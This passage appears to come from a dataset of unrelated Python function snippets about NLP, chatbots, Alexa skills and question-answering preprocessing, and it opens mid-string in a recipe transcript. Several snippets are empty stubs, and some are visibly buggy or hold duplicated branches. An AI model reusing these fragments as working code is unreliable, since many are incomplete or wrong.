dressing just a little bit I'm going to add two tablespoons of instant mashed potato flakes into the finished mixture I'm just going to fold this in basically what those do the potato flakes they bind up the dressing and make the dressing firm it also helps it kind of stick to the potatoes a little bit better so you you know the dressing doesn't run off of the potatoes which can be a problem with some recipes so there you go you want to make sure that those potato flakes are evenly distributed in there and everything is well mixed together everything is combined perfectly go ahead and give this a taste make sure that the salt is ok for you if you need a little bit more salt go ahead and add it if you want to if you need more mustard or vinegar or eggs whatever now is the time to do it but you want to go ahead and cover this with a piece of cling wrap saran wrap and refrigerate this for at least four to six hours before you serve this the longer you let this sit the better it gets but there you go there's your basic all-around simple homemade deli style or country style potato salad definitely give this recipe a try if you do let me know how you like it down below in the comment section if you like this video be sure to give it a thumbs up I would greatly appreciate it subscribe for more deliciousness and to keep up to date on all my latest videos thanks so much for watching and we will see you next time''']\n\n return str(example_text)", "def my_word_example_handler(handler_input):\n # type: (HandlerInput) -> Response\n slots = handler_input.request_envelope.request.intent.slots\n\n if synonym_slot in slots:\n curr_word = slots[synonym_slot].value\n handler_input.attributes_manager.session_attributes[\n synonym_slot_key] = curr_word\n\n try:\n synonyms = http_get(curr_word, True)\n\n if type(synonyms[0]) == dict:\n speech = (\"A synonym for {} is {}\".format(curr_word,\n synonyms[0]['meta']['syns'][0][0]))\n synonym_list = synonyms[0]['meta']['syns'][0]\n reprompt = (\"What word would you like a synonym for?\")\n else:\n speech = (\"No synonyms for {} are available. \"\n \"Can I look up another word?\").format(curr_word)\n reprompt = (\"What word would you like a synonym for?\")\n except:\n speech = (\"No synonyms for {} are available. \"\n \"Can I look up another word?\").format(curr_word)\n reprompt = (\"What word would you like a synonym for?\")\n else:\n speech = \"I'm not sure what word to find a synonym for, please try again\"\n reprompt = (\"I didn't catch that. 
What word would you like me \"\n \"me to look up a synonym for?\")\n\n handler_input.attributes_manager.session_attributes[previous_key] = speech\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def tt_entails(knowledge_base, sentence):\n return False", "def handle_sentence_complex(self, sentence, ctxinfo): \n global vocab\n global START_THRESHOLD \n global lower_attr\n \n for w_i, w in enumerate(sentence):\n case_class = w.get_case_class()\n # Does nothing if it's already lowercase or if it's not alphabetic\n\n if case_class != \"lowercase\" and case_class != \"?\":\n low_key = getattr(w, lower_attr).lower()\n token_stats = vocab[ low_key ]\n percents = get_percents( ctxinfo, token_stats )\n pref_form = get_preferred_form( percents )\n\n if case_class == \"UPPERCASE\" or case_class == \"MiXeD\" :\n if pref_form :\n setattr( w, lower_attr, pref_form ) \n # If the word is UPPERCASE or MiXed and does not have a \n # preferred form, what do you expect me to do about it? \n # Nothing, I just ignore it, it's a freaky weird creature! \n\n elif case_class == \"Firstupper\" :\n occurs = token_stats[ getattr( w, lower_attr) ]\n if ( w_i == 0 or\n re.match( \"[:\\.\\?!;]\", sentence[ w_i - 1 ].surface ) ) and \\\n float(occurs[ 1 ]) / float(occurs[ 0 ]) >= START_THRESHOLD :\n setattr( w, lower_attr, getattr( w, lower_attr ).lower() ) \n elif pref_form :\n setattr( w, lower_attr, pref_form )\n # Else, don't modify case, since we cannot know whether it\n # is a proper noun, a sentence start, a title word, a spell \n # error, etc.\n\n self.chain.handle_sentence(sentence, ctxinfo)", "def greeting(sentence):\n for word in sentence.split():\n if word.lower() in INPUTS:\n return random.choice(RESPONSES)", "def hey(sentence):\n if not sentence.strip():\n answer = 'Fine. 
Be that way!'\n elif sentence.isupper():\n answer = 'Woah, chill out!'\n elif sentence.endswith(\"?\"):\n answer = 'Sure.'\n else:\n answer = 'Whatever.'\n return answer", "def handle_sentence_simple(self, sentence, ctxinfo):\n global text_version\n global moses_version\n global lower_attr\n \n for w in sentence :\n setattr(w, lower_attr, getattr(w, lower_attr).lower())\n self.chain.handle_sentence(sentence, ctxinfo)", "def read_sentence(self,data):\n self.addSource(data)\n if self.checkLegal(data):\n self.addTarget(data)\n return True\n else:\n return False", "def score_sentence(self, sentence):\n\t\t\n\t\t# YOUR CODE HERE", "def test_model():\n test_text = \"what is the price of jug?\"\n model = spacy.load(\"../model/custom_ner_model\")\n doc = model(test_text)\n for ent in doc.ents:\n print(ent.text, ent.start_char, ent.end_char, ent.label_)", "def hasConstantForm(self, sentence):", "def getConstantSentenceForms(self):", "def create_example(line, tfidf_dict, is_training, args):\n sample = json.loads(line, object_pairs_hook=collections.OrderedDict)\n example_id = sample['example_id']\n question_text = sample['question_text']\n ori_doc_tokens = sample['document_text'].split()\n\n # 抽取特定段落list[list]\n tfidf_cands_ids = tfidf_dict[str(example_id)]\n # tfidf并不保证所有段落必定出现在所选段落内\n if is_training:\n long_answer_cand = sample['annotations'][0]['long_answer']['candidate_index']\n\n if long_answer_cand != -1:\n # answer_cand保证top_level是true\n if sample['long_answer_candidates'][long_answer_cand]['top_level'] is False:\n gt_start_token = sample['long_answer_candidates'][long_answer_cand]['start_token']\n gt_end_token = sample['long_answer_candidates'][long_answer_cand]['end_token']\n for il, cand in enumerate(sample['long_answer_candidates']):\n if cand['start_token'] <= gt_start_token and cand['end_token'] >= gt_end_token \\\n and cand['top_level'] is True:\n long_answer_cand = il\n break\n # training的时候当tfidf中没有包含正确答案,且long_answer是存在的时候,tfidf的结果则只选目标段落\n hit_answer = False\n for pids in tfidf_cands_ids:\n if long_answer_cand in pids:\n hit_answer = True\n break\n if hit_answer is False:\n tfidf_cands_ids = [[]]\n token_count = 0\n for ic, cand in enumerate(sample['long_answer_candidates']):\n if cand['top_level'] is True:\n tfidf_cands_ids[-1].append(ic)\n token_count += (cand['end_token'] - cand['start_token'])\n if token_count > 600:\n tfidf_cands_ids.append([])\n token_count = 0\n while len(tfidf_cands_ids[-1]) == 0:\n tfidf_cands_ids.pop(-1)\n # 防止负样本爆炸,只选目标段落\n tfidf_cands_ids = [cands for cands in tfidf_cands_ids if long_answer_cand in cands]\n\n # 由于接下来要对special_tokens排序,所以这里tfidf选择的段落要按照首段排序\n tfidf_cands_ids = sorted(tfidf_cands_ids, key=lambda x: x[0])\n\n if args.do_combine: # 如果do_combine,我们把所有抽取的candidates合并到一起\n tfidf_cands_ids_ = []\n for c in tfidf_cands_ids:\n tfidf_cands_ids_.extend(c)\n tfidf_cands_ids = [tfidf_cands_ids_]\n\n # 获取candidate的type信息,去除HTML符号\n # 保留特殊token到段首\n # 注意table paragraph list最小起步是1\n special_tokens_count = {'ContextId': -1, 'Table': 0, 'Paragraph': 0, 'List': 0}\n\n # 为了保证一致性,TABLE, Paragraph等结构信息还是尽可能保留...\n selected_ps = []\n for i, cand_ids in enumerate(tfidf_cands_ids):\n position_map = [] # 新paragraph到老paragraph的token位置映射\n map_to_origin = {} # 为了保证能够对答案位置进行正确的偏移,这里需要重新搞一波map映射\n p_tokens = []\n for cand_id in cand_ids:\n st = sample['long_answer_candidates'][cand_id]['start_token']\n ed = sample['long_answer_candidates'][cand_id]['end_token']\n ind = st # 追踪pos_map\n ori_cand_tokens = ori_doc_tokens[st:ed]\n # 先加ContextId特殊token\n 
special_tokens_count['ContextId'] += 1\n special_tokens_count['ContextId'] = min(special_tokens_count['ContextId'], args.max_position)\n p_tokens.append('[ContextId={}]'.format(special_tokens_count['ContextId']))\n position_map.append(ind)\n cand_type = get_candidate_type(ori_cand_tokens)\n if cand_type in special_tokens_count:\n special_tokens_count[cand_type] += 1\n special_tokens_count[cand_type] = min(special_tokens_count[cand_type], args.max_position)\n p_tokens.append('[' + cand_type + '=' + str(special_tokens_count[cand_type]) + ']')\n position_map.append(ind)\n for token in ori_cand_tokens:\n if '<' not in token: # 去除HTML符号\n p_tokens.append(token)\n position_map.append(ind)\n map_to_origin[ind] = len(position_map) - 1\n ind += 1\n assert len(position_map) == len(p_tokens)\n\n selected_ps.append({'paragraph_tokens': p_tokens,\n 'question_text': question_text,\n 'position_map': position_map,\n 'map_to_origin': map_to_origin,\n 'example_id': example_id,\n 'paragraph_id': str(example_id) + '_' + str(i),\n 'answer_type': AnswerType['UNKNOWN'],\n 'long_start': -1,\n 'long_end': -1,\n 'short_start': -1,\n 'short_end': -1,\n 'short_answer_text': None})\n\n answer = None\n answer_text = None\n if is_training and 'annotations' in sample:\n # 答案只取第一个标注\n annotation = sample['annotations'][0]\n if annotation is not None:\n long_answer = annotation['long_answer']\n if long_answer['candidate_index'] != -1:\n answer_type = AnswerType['LONG']\n ori_long_start = long_answer['start_token']\n ori_long_end = long_answer['end_token']\n else:\n answer_type = AnswerType['UNKNOWN']\n ori_long_start = -1\n ori_long_end = -1\n\n assert annotation[\"yes_no_answer\"] in (\"YES\", \"NO\", \"NONE\")\n if annotation[\"yes_no_answer\"] == 'YES':\n answer_text = 'YES'\n answer_type = AnswerType['YES']\n elif annotation[\"yes_no_answer\"] == 'NO':\n answer_text = 'NO'\n answer_type = AnswerType['NO']\n\n short_answers = annotation['short_answers']\n # 这里short answer必须排序\n short_answers = sorted(short_answers, key=lambda x: x['start_token'])\n if len(short_answers) > 0:\n # TODO:可能存在多个short,multi-tag\n answer_type = AnswerType['SHORT']\n short_ans = random.choice(short_answers)\n ori_short_start = short_ans['start_token']\n ori_short_end = short_ans['end_token']\n answer_text = ori_doc_tokens[ori_short_start:ori_short_end]\n answer_text = \" \".join([at for at in answer_text if '<' not in at])\n else:\n ori_short_start = -1\n ori_short_end = -1\n else:\n answer_type = AnswerType['UNKNOWN']\n ori_long_start = -1\n ori_long_end = -1\n ori_short_start = -1\n ori_short_end = -1\n\n answer = {'answer_type': answer_type,\n 'ori_long_start': ori_long_start,\n 'ori_long_end': ori_long_end,\n 'ori_short_start': ori_short_start,\n 'ori_short_end': ori_short_end}\n\n if answer['answer_type'] == AnswerType['SHORT'] and answer_text == \"\":\n print('WRONG SHORT', answer, answer_text)\n answer['answer_type'] = AnswerType['LONG']\n answer['ori_short_start'] = -1\n answer['ori_short_end'] = -1\n\n examples = []\n for p_sample in selected_ps:\n if answer and answer['answer_type'] != AnswerType['UNKNOWN']:\n # 如果长答案在候选里,那么首位必然都在这个候选里,!!!注意这里的ori_long_end必须-1,否则可能会漏!!!\n if answer['ori_long_start'] in p_sample['map_to_origin'] \\\n and answer['ori_long_end'] - 1 in p_sample['map_to_origin']:\n final_long_start = p_sample['map_to_origin'][answer['ori_long_start']]\n final_long_end = p_sample['map_to_origin'][answer['ori_long_end'] - 1] + 1\n long_answer_text = \" 
\".join(p_sample['paragraph_tokens'][final_long_start:final_long_end])\n\n p_sample['answer_type'] = answer['answer_type']\n p_sample['long_start'] = final_long_start\n p_sample['long_end'] = final_long_end\n\n # 短答案必然在长答案所在段落里面\n if answer['answer_type'] == AnswerType['SHORT']:\n final_short_start = p_sample['map_to_origin'][answer['ori_short_start']]\n final_short_end = p_sample['map_to_origin'][answer['ori_short_end'] - 1] + 1\n p_sample['short_start'] = final_short_start\n p_sample['short_end'] = final_short_end\n\n new_answer_text = \" \".join(p_sample['paragraph_tokens'][final_short_start:final_short_end])\n assert new_answer_text == answer_text, (new_answer_text, answer_text, long_answer_text)\n p_sample['short_answer_text'] = new_answer_text\n\n # 由于negative的段落太多了,所以这里先过滤掉一部分\n elif is_training and random.random() > args.example_neg_filter:\n continue\n\n # 由于negative的段落太多了,所以这里先过滤掉一部分\n elif is_training and random.random() > args.example_neg_filter:\n continue\n\n p_sample.pop('map_to_origin')\n examples.append(p_sample)\n\n return examples", "def stemming(self,sentence):", "async def phrase(self, ctx):\n await self.heleus.send_command_help(ctx)", "def handle_sentence(self, sentence, ctxinfo):\n global vocab\n global lower_attr\n prev_key = \"\"\n for w_i, w in enumerate(sentence):\n key = getattr(w, lower_attr)\n low_key = key.lower()\n forms = vocab.get( low_key, {} )\n form_entry = forms.get( key, [ 0, 0 ] )\n # a form entry has two counters, one for the occurrences and one for\n # the number of times it occurred at the beginning of a sentence. \n # Therefore, form_entry[0] >= form_entry[1]\n form_entry[ 0 ] = form_entry[ 0 ] + 1 \n # This form occurrs at the first position of the sentence or after a\n # period (semicolon, colon, exclamation or question mark). Count it\n if w_i == 0 or re.match( \"[:\\.\\?!;]\", prev_key ) :\n form_entry[ 1 ] = form_entry[ 1 ] + 1 \n forms[ key ] = form_entry\n vocab[ low_key ] = forms\n prev_key = key", "def generate_sentence(session, model, config, *args, **kwargs):\n return generate_text(session, model, config, *args, stop_tokens=['<eos>'], **kwargs)", "def test20():\n\tdef highlight_word(sentence, word):\n\t\treturn(\" \".join(x) for x in sentence.split())\n\n\tprint(highlight_word(\"Have a nice day\", \"nice\"))\n\tprint(highlight_word(\"Shhh, don't be so loud!\", \"loud\"))\n\tprint(highlight_word(\"Automating with Python is fun\", \"fun\"))", "def get_intro_message() -> str:\n return \"\"\"You are about to begin a new record.\nType the text sample you want to record.\nThis first sample MUST be typed by the real user (no impostor data).\"\"\"", "def generate_sentence(self,t=20):\n return result", "def create_examples(topics, sentences):\n input_examples = []\n \n for i in range(len(sentences)):\n input_examples.append(InputExample(text_a=topics[i], text_b=sentences[i], label='NoArgument'))\n return input_examples", "def test_forward_sentence_extend_selection(self):\n before_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. 
StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n after_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"1.264\", \"1.264\"),\n after_sel=(\"1.264\", \"1.395\"),\n command_name=\"forward-sentence-extend-selection\",\n )", "def main():\n if sentence(Parser()):\n print 'yes'\n else:\n print 'no'", "def negation_check(self,sentence):", "def parser(sent_list): #input: list of sentences", "def process_input(fname,onlynugget,onlyarg):\n content=utils.readFileEncode(fname,'utf8')\n lines = content.split('\\n')[:-1]\n sentences=[]\n labels=[]\n sent=[]\n label=[]\n for i in range(len(lines)):\n if len(lines[i])>3:\n words=lines[i].split('\\t')\n word={'originalText':words[0],'offset':int(words[1])}\n sent.append(word)\n if onlynugget:\n if words[2] in NuggetList10:\n label.append(words[2]) \n else:\n label.append('O')\n elif onlyarg:\n if words[2] in ArgumentList:\n\n if 'Software' in words[2]:\n label.append(words[2][0:2]+'System')\n else:\n label.append(words[2])\n else:\n label.append('O')\n else:\n if len(sent)>0 and len(label)>0: \n sentences.append(sent)\n labels.append(label) \n sent=[]\n label=[]\n elif len(sent)==0 and i < len(lines)-1:\n sentences.append([])\n labels.append([])\n \n return sentences,labels", "def greeting(sentence):\r\n for word in sentence.split():\r\n if word.lower() in GREETING_INPUTS:\r\n return random.choice(GREETING_RESPONSES)", "def greeting(sentence):\n for word in sentence.split():\n if word.lower() in GREETING_INPUTS:\n return random.choice(GREETING_RESPONSES)", "def storytelling(state_object, nlg_object, classifier):\n # create arguments for the depth_first_Search\n visited = state_object.story_told\n story_graph = state_object.story_graph\n first_node = state_object.current_node\n is_ended = state_object.is_story_ended\n nodes_to_visit = state_object.nodes_to_visit\n\n # do the depth_first_search to find the story increment to tell next\n node_name, text 
= depth_first_search(visited, story_graph, first_node, nodes_to_visit, is_ended)\n utterance = state_object.utterance\n custom_tokens = remove_noise(word_tokenize(utterance))\n result = classifier.classify(dict([token, True] for token in custom_tokens))\n print(\"NEGATIVO O POSITIVO?\", result)\n if state_object.intent == \"affirm\":\n result = \"Positive\"\n elif state_object.intent == \"deny\":\n result = \"Negative\"\n if state_object.previous_intent == \"ynq\" or state_object.previous_intent == \"whq\":\n if \"Positive\" in result:\n acknowledge = \"Great!\"\n elif \"Negative\" in result and node_name == \"sentence10\":\n acknowledge = \"Sorry about that.\"\n else:\n acknowledgement = [\"Oh, sorry about that. I hope to be able to answer correctly next time. Anyway, back \"\n \"to the story.\", \"I'm sorry, maybe I just don't know the answer\",\n \"Ops! So, what was I going to say? Oh right!\"]\n acknowledge = random.choice(acknowledgement)\n else:\n if \"Positive\" in result:\n if node_name == \"sentence1\":\n acknowledge = \"Great, let's start!\"\n elif node_name == \"sentence2\":\n acknowledge = \"Oh, do you know? That's great I guess.\"\n elif node_name == \"sentence3\":\n acknowledge = \"Nice! \"\n elif node_name == \"sentence4\":\n acknowledge = \"Ehm, good guess?\"\n elif node_name == \"sentence5\":\n acknowledge = \"I know, right?\"\n elif node_name == \"sentence6\":\n acknowledge = \"Yes! And they are not alone.\"\n elif node_name == \"sentence7\":\n acknowledge = \"Yeah so...\"\n elif node_name == \"sentence8\":\n acknowledge = \"I agree! \"\n elif node_name == \"sentence9\":\n acknowledge = \"\"\n elif node_name == \"sentence10\":\n acknowledge = \"\"\n else:\n acknowledge = \"\"\n elif \"Negative\" in result or state_object.intent == \"deny\":\n if node_name == \"sentence1\":\n acknowledge = \"Ok, so...\"\n elif node_name == \"sentence2\":\n acknowledge = \"I should tell you why: it would have been nice to capture it on camera.\"\n elif node_name == \"sentence3\":\n acknowledge = \"It's just a bowl for benjamin and it's where everything happened.\"\n elif node_name == \"sentence4\":\n acknowledge = \"Fair enough!\"\n elif node_name == \"sentence5\":\n acknowledge = \"Yeah...\"\n elif node_name == \"sentence6\":\n acknowledge = \"Well, yes, but there are other animals too.\"\n elif node_name == \"sentence7\":\n acknowledge = \"Fair enough!\"\n elif node_name == \"sentence8\":\n acknowledge = \"\"\n elif node_name == \"sentence9\":\n acknowledge = \"But no worries, I don't think he hurt himself. 
\"\n elif node_name == \"sentence10\":\n acknowledge = \"\"\n else:\n acknowledge = \"\"\n else:\n acknowledge = \"\"\n # save last visited node and update is_ended\n state_object.current_node = node_name\n state_object.is_story_ended = is_ended\n template_fillers = {'text': text, 'acknowledge': acknowledge}\n templates = nlg_object.storytelling_s1_templates\n if node_name == \"sentence8\":\n if \"Positive\" in result or state_object.intent == \"affirm\":\n curr_templates = templates[\"sentence8pos\"]\n else:\n curr_templates = templates[\"sentence8neg\"]\n else:\n curr_templates = templates[node_name]\n template = random.choice(curr_templates)\n return template.format(**template_fillers)", "def process_action(action, params, context):\n if action == 'define_word':\n word = params.get('word')\n if word is None:\n return make_simple_reply('I do not know this word')\n word_id = normalize_word(word)\n word_model = ndb.Key('Word', word_id).get()\n if word_model is not None:\n word_model.practice_count += 1\n word_model.learned = False\n word_model.put()\n return generate_definition_reply(word_model)\n \n word_model = Word()\n word_model.learned = False\n word_model.word = word\n word_model.key = ndb.Key('Word', word_id)\n if not get_word_definition(word_model):\n return make_simple_reply('I do not know this word')\n else:\n word_model.practice_count = 1\n word_model.put()\n return generate_definition_reply(word_model)\n \n elif action == 'practice':\n keys = Word.query().filter(Word.learned == False).fetch(keys_only=True)\n selected_word_key = random.sample(keys, 1)[0]\n reply = make_simple_reply(\n 'How about %s! Do you remember it?' % selected_word_key.get().word)\n reply['context'] = [{\n 'name': 'practice',\n 'lifespan': 2,\n 'parameters': {'word_id': selected_word_key.id()}\n }]\n return reply\n \n elif action == 'practice_known':\n # User knows this word. Mark it as learned\n word_id = context.get('practice', {}).get('word_id', None)\n reset_context = [{\n 'name': 'practice',\n 'lifespan': 0,\n 'parameters': {'word_id': word_id}\n }]\n\n if word_id is None:\n reply = make_simple_reply('I am afraid I do not know this word')\n reply['context'] = reset_context\n return reply\n\n word_model = ndb.Key('Word', word_id).get()\n if word_model is None:\n reply = make_simple_reply('I am afraid I do not know this word')\n reply['context'] = reset_context\n return reply\n\n word_model.learned = True\n word_model.put()\n reply = make_simple_reply('OK, I will not ask this word again')\n reply['context'] = reset_context\n return reply\n \n elif action == 'practice_unknown':\n # User does not know this word. 
Return its definition\n word_id = context.get('practice', {}).get('word_id', None)\n reset_context = [{\n 'name': 'practice',\n 'lifespan': 0,\n 'parameters': {'word_id': word_id}\n }]\n\n if word_id is None:\n reply = make_simple_reply('I do not know this word either, sorry')\n reply['context'] = reset_context\n return reply\n\n word_model = ndb.Key('Word', word_id).get()\n if word_model is None:\n reply = make_simple_reply('I do not know this word either, sorry')\n reply['context'] = reset_context\n return reply\n\n word_model.practice_count += 1\n word_model.learned = False\n word_model.put()\n reply = generate_definition_reply(word_model)\n reply['context'] = reset_context\n return reply\n \n return make_simple_reply('I did not get that')", "def test_explained_text(self):\n result = self._do_output(o.ExplainedTextOutput(o.Color.Never), self._demo_msgs)\n self.assertEqual(result,\n \"mock: mock.cmake(1): error: short text\\n\"\n \" * long text\\n\"\n \" * You can ignore this problem with --ignore mock_msg\\n\"\n \"mock: mock.cmake(2): warning: short text\\n\"\n \"mock: mock.cmake(3): notice: short text\\n\"\n \"mock: error: short text\\n\"\n \"mock: mock.cmake: error: short text\\n\"\n )", "def approve_lyrics():\n pass", "def hello():\n return 'Hello I like to make AI Apps'", "def solve_example(parser: ArgumentParser) -> None:\n parser.add_argument(\"--word\", type=str, help=\"Word representing the one relator\", required=True)", "def func(self):\n if not self.raw:\n self.msg(\"Say what?\")\n return\n options = {\"is_pose\": True}\n speech = self.raw.lstrip(\" \")\n # calling the speech hook on the location\n speech = self.caller.location.at_say(speech)\n # Feedback for the object doing the talking.\n langstring = \"\"\n current = self.caller.languages.current_language\n if current and current.lower() != \"arvani\":\n langstring = \" in %s\" % current.capitalize()\n options.update({\"language\": current, \"msg_content\": speech})\n self.msg(\n 'You say%s, \"%s{n\"' % (langstring, speech),\n from_obj=self.caller,\n options=options,\n )\n # Build the string to emit to neighbors.\n pre_name_emit_string = ' says%s, \"%s{n\"' % (langstring, speech)\n self.caller.location.msg_action(\n self.caller, pre_name_emit_string, exclude=[self.caller], options=options\n )\n self.caller.posecount += 1", "def question_new_translate():", "async def prepare(self):\n self.sentence = choice(self.sentences)", "def reply(sentence, x):\n if sentence.lower() == 'q':\n return 'Goodbye.'\n elif sentence.lower() == 'h':\n return HELP_STRING\n elif sentence.lower() == 's':\n return diagnosis_reply()\n else:\n return question_reply(sentence, x)", "def insult_me(\n message : str \n ):\n \n #load model\n model = Detoxify('original')\n \n #predict toxicity\n results = model.predict(message)\n \n #echo results\n click.echo(pd.Series(results))", "def generate_sentence(self, initial=\"\") -> str:\n words = initial.split()\n if not words:\n # the first word should occur frequently after a sentence boundary\n words.append('SENTENCE_BOUNDARY')\n\n for i in range(30): # keep sentences from getting too long\n next_word = self.predict_next(words[-1])\n # avoid generating sentences with UNKNOWN_TOKEN\n while next_word == 'UNKNOWN_TOKEN':\n # We sample under the condition that no token in the sentence\n # is unknown by resampling when the condition is violated.\n next_word = self.predict_next(words[-1])\n if next_word == 'SENTENCE_BOUNDARY':\n break\n else:\n words.append(next_word)\n if i == 29:\n words.append('...')\n 
words.pop(0) # remove SENTENCE_BOUNDARY\n return ' '.join(words) + '\\n'", "def convert_single_ls_example(example, tokenizer, is_training, args):\n tok_to_orig_index = []\n orig_to_tok_index = []\n all_doc_tokens = [] # all subtokens of original doc after tokenizing\n features = []\n for (i, token) in enumerate(example['paragraph_tokens']):\n orig_to_tok_index.append(len(all_doc_tokens))\n sub_tokens = albert_tokenize(tokenizer, token)\n tok_to_orig_index.extend([i] * len(sub_tokens))\n all_doc_tokens.extend(sub_tokens)\n\n # 特别注意!由于在paragraph_tokens中我们的token已经映射过一次了\n # 这里wordpiece等于又映射了一遍,所以这里的操作是二次映射\n if example['position_map']:\n tok_to_orig_index = [example['position_map'][index] for index in tok_to_orig_index]\n\n # QUERY\n query_tokens = []\n query_tokens.append(\"[Q]\")\n query_tokens.extend(albert_tokenize(tokenizer, example['question_text']))\n if len(query_tokens) > args.max_query_length:\n query_tokens = query_tokens[-args.max_query_length:]\n\n # ANSWER 预处理的时候先长短分开\n tok_long_start_position = -1\n tok_long_end_position = -1\n tok_short_start_position = -1\n tok_short_end_position = -1\n # 这里终点是必然在para_tokens内的\n if is_training:\n if example['answer_type'] != AnswerType['UNKNOWN']:\n tok_long_start_position = orig_to_tok_index[example['long_start']]\n if example['long_end'] == len(orig_to_tok_index):\n tok_long_end_position = orig_to_tok_index[-1]\n else:\n tok_long_end_position = orig_to_tok_index[example['long_end']] - 1\n if example['answer_type'] == AnswerType['SHORT']:\n tok_short_start_position = orig_to_tok_index[example['short_start']]\n if example['short_end'] == len(orig_to_tok_index):\n tok_short_end_position = orig_to_tok_index[-1]\n else:\n tok_short_end_position = orig_to_tok_index[example['short_end']] - 1\n\n # Get max tokens number for original doc,\n # should minus query tokens number and 3 special tokens\n # The -3 accounts for [CLS], [SEP] and [SEP]\n max_tokens_for_doc = args.max_seq_length - len(query_tokens) - 3\n\n # We can have documents that are longer than the maximum sequence length.\n # To deal with this we do a sliding window approach, where we take chunks\n # of up to our max length with a stride of `doc_stride`.\n _DocSpan = collections.namedtuple(\"DocSpan\", [\"start\", \"length\"])\n doc_spans = []\n start_offset = 0\n while start_offset < len(all_doc_tokens):\n length = len(all_doc_tokens) - start_offset # compute number of tokens remaining unsliding\n length = min(length, max_tokens_for_doc) # determine current sliding window size\n doc_spans.append(_DocSpan(start=start_offset, length=length))\n\n # Consider case for reaching end of original doc\n if start_offset + length == len(all_doc_tokens):\n break\n start_offset += min(length, args.doc_stride)\n\n # Convert window + query + special tokens to feature\n for (doc_span_index, doc_span) in enumerate(doc_spans):\n tokens = []\n token_to_orig_map = {}\n token_is_max_context = {}\n segment_ids = []\n tokens.append(\"[CLS]\")\n segment_ids.append(0)\n tokens.extend(query_tokens)\n segment_ids.extend([0] * len(query_tokens))\n tokens.append(\"[SEP]\")\n segment_ids.append(0)\n\n for i in range(doc_span.length):\n split_token_index = doc_span.start + i\n token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]\n\n is_max_context = check_is_max_context(doc_spans, doc_span_index, split_token_index)\n token_is_max_context[len(tokens)] = is_max_context\n tokens.append(all_doc_tokens[split_token_index])\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n assert 
len(tokens) == len(segment_ids)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding = [0] * (args.max_seq_length - len(input_ids))\n input_ids.extend(padding)\n input_mask.extend(padding)\n segment_ids.extend(padding)\n\n assert len(input_ids) == args.max_seq_length\n assert len(input_mask) == args.max_seq_length\n assert len(segment_ids) == args.max_seq_length\n\n long_start_position = None\n long_end_position = None\n short_start_position = None\n short_end_position = None\n answer_type = None\n answer_text = \"\"\n if is_training:\n doc_start = doc_span.start\n doc_end = doc_span.start + doc_span.length - 1\n # For training, if our document chunk does not contain an annotation\n # we throw it out, since there is nothing to predict.\n contains_an_annotation = (tok_long_start_position >= doc_start and tok_long_end_position <= doc_end)\n # 负样本需要经过采样,且目标为[CLS]\n if (not contains_an_annotation) or example['answer_type'] == AnswerType['UNKNOWN']:\n if args.include_unknowns < 0 or random.random() > args.include_unknowns:\n continue\n long_start_position = 0\n long_end_position = 0\n short_start_position = 0\n short_end_position = 0\n answer_type = AnswerType['UNKNOWN']\n else:\n doc_offset = len(query_tokens) + 2\n long_start_position = tok_long_start_position - doc_start + doc_offset\n long_end_position = tok_long_end_position - doc_start + doc_offset\n if example['answer_type'] == AnswerType['SHORT']:\n short_start_position = tok_short_start_position - doc_start + doc_offset\n short_end_position = tok_short_end_position - doc_start + doc_offset\n else:\n short_start_position = 0\n short_end_position = 0\n answer_type = example['answer_type']\n\n # 如果是短答案,对一下答案是否正确\n if example['answer_type'] == AnswerType['SHORT']:\n answer_text = \" \".join(tokens[short_start_position:(short_end_position + 1)])\n answer_text = answer_text.replace(' ', '').replace(u\"▁\", ' ').strip()\n gt_answer = example['short_answer_text'].lower()\n answer_text_chars = [c for c in answer_text if c not in \" \\t\\r\\n\" and ord(c) != 0x202F]\n gt_answer_chars = [c for c in gt_answer if c not in \" \\t\\r\\n\" and ord(c) != 0x202F]\n if \"\".join(answer_text_chars) != \"\".join(gt_answer_chars) \\\n and len(\"\".join(answer_text_chars)) != len(\"\".join(gt_answer_chars)):\n print(answer_text, 'V.S.', gt_answer)\n\n feature = InputLSFeatures(\n unique_id=None,\n example_index=None,\n doc_span_index=doc_span_index,\n tokens=tokens,\n token_to_orig_map=token_to_orig_map,\n token_is_max_context=token_is_max_context,\n input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n long_start_position=long_start_position,\n long_end_position=long_end_position,\n short_start_position=short_start_position,\n short_end_position=short_end_position,\n answer_text=answer_text,\n answer_type=answer_type)\n\n features.append(feature)\n\n return features", "def respond(sentence):\n cleaned = preprocess_text(sentence)\n parsed = TextBlob(cleaned)\n pprint(\"POSITION Tags\")\n pprint(parsed.pos_tags)\n\n # Loop through all the sentences, if more than one. 
